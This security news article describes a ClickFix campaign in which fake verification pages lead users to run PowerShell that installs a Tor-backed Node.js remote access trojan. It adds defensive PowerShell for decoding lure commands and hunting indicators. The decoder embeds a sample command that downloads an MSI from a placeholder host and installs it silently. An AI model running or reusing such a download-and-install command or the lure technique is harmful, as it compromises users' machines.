ClickFix attack drops Node.js Windows RAT that hides behind Tor and in-memory payloads
A new ClickFix campaign is targeting Windows users with a fake browser verification page that tricks them into running a hidden PowerShell command. Netskope Threat Labs said the command downloads a malicious MSI installer named NodeServer-Setup-Full.msi, which then deploys a modular Node.js-based remote access trojan on the victim machine.
The malware stands out because it keeps much of its real functionality off disk. Netskope said the core modules arrive only after the malware connects to its command server, where they run in memory as JavaScript strings. That design lowers the forensic footprint and makes static detection harder.
The operators also route command-and-control traffic through the Tor network using gRPC streaming. That gives them a persistent two-way channel while masking the backend infrastructure, which makes takedowns and attribution more difficult.
How the ClickFix chain works
The attack begins with a fake CAPTCHA or verification page. Netskope said the lure places a Base64-encoded PowerShell command on the clipboard or prompts the user to run it, a familiar pattern in ClickFix campaigns that rely on social engineering instead of exploiting a software vulnerability.
That command downloads NodeServer-Setup-Full.msi from cloud-verificate[.]com and installs it silently. Netskope said the files land in %LOCALAPPDATA%\LogicOptimizer\, where the malware creates a LogicOptimizer entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run so it launches at logon.
To stay quiet, the installer uses conhost.exe in headless mode to launch the bundled Node.js runtime. The malware then decrypts its configuration through layered routines, including AES-256-CBC and XOR, before revealing its Tor hidden service destination.
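The first thing an analyst usually has to do with a ClickFix lure is recover what the Base64 blob on the clipboard actually runs. The following is an added example, not code from the article or from Netskope: it decodes a blob using the PowerShell -EncodedCommand convention (Base64 over UTF-16LE text, which is an assumption about the lure's format) and flags the download-and-silent-install pattern described above. The sample blob is constructed from a placeholder command; the URL is a stand-in, not the campaign's infrastructure.

```powershell
# Added example, not from the article or Netskope. Assumes the -EncodedCommand
# convention (Base64 over UTF-16LE). If the lure uses plain Base64 over ASCII or
# a FromBase64String call inside an inline command, swap the encoding below.

function Decode-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    $bytes = [Convert]::FromBase64String($Base64)
    return [Text.Encoding]::Unicode.GetString($bytes)
}

# Heuristics for the chain described above: fetch a file, run msiexec quietly,
# hide the window. Pattern names and regexes are mine, not a vendor signature.
function Get-CommandIndicators {
    param([Parameter(Mandatory)][string]$Command)
    $checks = [ordered]@{
        'downloads a file'         = 'Invoke-WebRequest|\biwr\b|curl|Start-BitsTransfer|DownloadFile'
        'installs an MSI silently' = 'msiexec.*(/q\b|/qn|/quiet)|\.msi\b'
        'hides its window'         = '-w(indow)?s(tyle)?\s+hidden|-nop\b|-noni\b'
        'references a domain'      = '[a-z0-9-]+\.[a-z]{2,}'
    }
    $hits = @()
    foreach ($name in $checks.Keys) {
        if ($Command -match $checks[$name]) { $hits += $name }
    }
    return $hits
}

# Constructed sample standing in for the clipboard payload. example.invalid is a
# placeholder; only the MSI file name comes from the article.
$plain  = "Invoke-WebRequest -Uri 'https://example.invalid/NodeServer-Setup-Full.msi' -OutFile `$env:TEMP\s.msi; msiexec /i `$env:TEMP\s.msi /qn"
$sample = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($plain))

$decoded = Decode-EncodedCommand -Base64 $sample
Write-Output "Decoded command:`n$decoded"
Write-Output ("Indicators: " + ((Get-CommandIndicators -Command $decoded) -join ', '))
```

Run it in an isolated analysis VM, never on the affected host, and paste the real blob in place of `$sample`. Decoding only shows the first stage; the MSI, the Node.js runtime and the in-memory modules still have to be pulled apart separately.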
Why this campaign is more dangerous than a basic loader
Netskope said the RAT uses a modular framework where new capabilities arrive only after the system checks in with the command server. That means analysts may not find the most dangerous pieces on disk, because the operators can push them later and execute them directly in memory.
Researchers also found an exposed admin panel due to an operational security mistake by the attackers. According to Netskope, that panel revealed a malware-as-a-service backend with support for multiple operators, role-based access control, custom module delivery, wallet tracking, and Telegram alerts for new victim activity.
The malware also profiles each infected machine before the operators decide what to do next. Netskope said it collects operating system details, hardware information, geographic location, external IP data, and a list of installed security products, including Windows Defender, CrowdStrike, Kaspersky, and SentinelOne.
Key details at a glance
| Item | Confirmed detail |
|---|---|
| Delivery method | ClickFix fake verification or CAPTCHA lure |
| Installer name | NodeServer-Setup-Full.msi |
| Install path | %LOCALAPPDATA%\LogicOptimizer\ |
| Persistence | HKCU\Software\Microsoft\Windows\CurrentVersion\Run |
| Runtime | Bundled Node.js launched through conhost.exe |
| C2 method | gRPC over Tor |
| Execution model | Dynamic modules delivered and executed in memory |
| Extra finding | Exposed MaaS admin panel |
What defenders should watch for
- Unexpected PowerShell activity followed by silent MSI downloads.
- New LogicOptimizer entries in the Windows Run key.
- Suspicious conhost.exe or Node.js processes on systems that should not run Node locally.
- Tor-related outbound traffic and unusual SOCKS5 proxy behavior.
- Endpoint telemetry showing in-memory JavaScript execution after a new C2 connection.
- Users pasting and launching commands from fake verification pages.
What organizations should do now
Security teams should review Windows endpoints for PowerShell-driven MSI installs, Tor downloads, unexpected Node.js runtimes, and new autorun entries tied to LogicOptimizer. Netskope said defenders should also monitor for unusual outbound traffic and treat this campaign as a full remote access threat, not just a simple dropper.
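A single-host hunt for the artifacts the article names, as an added example that is not part of the original article or Netskope's tooling. It checks the current user's Run key for a LogicOptimizer value, the %LOCALAPPDATA%\LogicOptimizer\ directory, headless conhost.exe and node.exe processes, and PowerShell script block logs for MSI download-and-install activity. The event filter assumes Script Block Logging (event 4104) is enabled; the regexes and thresholds are mine.

```powershell
# Added example, not from the article or Netskope. Run elevated in PowerShell 5.1
# or later so Win32_Process returns command lines for all users' processes.

function Find-LogicOptimizerIndicators {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Persistence: LogicOptimizer value in the current user's Run key.
    #    HKCU only covers the user running this script; to sweep every profile,
    #    repeat this check against each HKU:\<SID>\Software\...\Run hive.
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if ($run -and $run.PSObject.Properties['LogicOptimizer']) {
        $findings.Add("Run key: LogicOptimizer = $($run.LogicOptimizer)")
    }

    # 2. Install directory reported by Netskope.
    $installDir = Join-Path $env:LOCALAPPDATA 'LogicOptimizer'
    if (Test-Path -LiteralPath $installDir) {
        $findings.Add("Install directory present: $installDir")
        Get-ChildItem -LiteralPath $installDir -Recurse -File -ErrorAction SilentlyContinue |
            ForEach-Object { $findings.Add("  file: $($_.FullName) ($($_.Length) bytes)") }
    }

    # 3. Live processes: headless conhost.exe, node.exe, or anything referencing
    #    the install directory. Parent PID helps reconstruct the launch chain.
    $procs = Get-CimInstance -ClassName Win32_Process
    foreach ($p in $procs) {
        $cmd = [string]$p.CommandLine
        if ($p.Name -eq 'conhost.exe' -and $cmd -match '--headless') {
            $findings.Add("Headless conhost.exe PID $($p.ProcessId) (parent $($p.ParentProcessId)): $cmd")
        }
        if ($p.Name -eq 'node.exe' -or $cmd -match 'LogicOptimizer') {
            $findings.Add("Node/LogicOptimizer process PID $($p.ProcessId) (parent $($p.ParentProcessId)): $cmd")
        }
    }

    # 4. PowerShell script blocks (event 4104) that fetch or quietly install an MSI.
    #    Only populated when Script Block Logging is enabled on the host.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents 2000 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '\.msi\b' -and
                       $_.Message -match 'msiexec|Invoke-WebRequest|\biwr\b|DownloadFile|FromBase64String' } |
        ForEach-Object {
            $snippet = $_.Message.Substring(0, [Math]::Min(200, $_.Message.Length))
            $findings.Add("Script block $($_.TimeCreated): $snippet")
        }

    return $findings
}

$results = Find-LogicOptimizerIndicators
if ($results.Count -eq 0) { 'No LogicOptimizer indicators found on this host.' } else { $results }
```

The host checks are cheap enough to push through your endpoint management tool across the fleet; the Tor and gRPC side of the campaign is better hunted at the network edge, where outbound connections from a bundled node.exe to Tor relays stand out on machines that have no business running Node.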
Training still matters because ClickFix depends on the victim running the command. Microsoft’s February write-up on another ClickFix variant made the same point: these campaigns work because users trust the on-screen instructions and execute commands they did not generate themselves.
The broader lesson is clear. Threat actors no longer need a noisy exploit chain to land a sophisticated RAT on Windows. A fake browser check, a copied command, and a silent installer can be enough to open a Tor-backed remote access channel that stays hard to spot and hard to disrupt.
FAQ
What is ClickFix?
ClickFix is a social engineering technique that uses fake verification or CAPTCHA pages to convince users to run malicious commands on their own machines. Netskope and Microsoft both describe it as a growing delivery method for modern malware campaigns.
Why is this RAT hard to detect?
The malware uses Node.js, loads key modules only after it reaches the command server, and executes those modules in memory. It also hides its command traffic behind Tor and gRPC.
How does the malware persist?
Netskope said it creates a LogicOptimizer value under the current user Run key so it launches each time the user signs in.
What should defenders look for?
Look for PowerShell-triggered MSI installs, unexpected Node.js execution, suspicious conhost.exe behavior, Tor downloads, and new autorun registry entries tied to LogicOptimizer.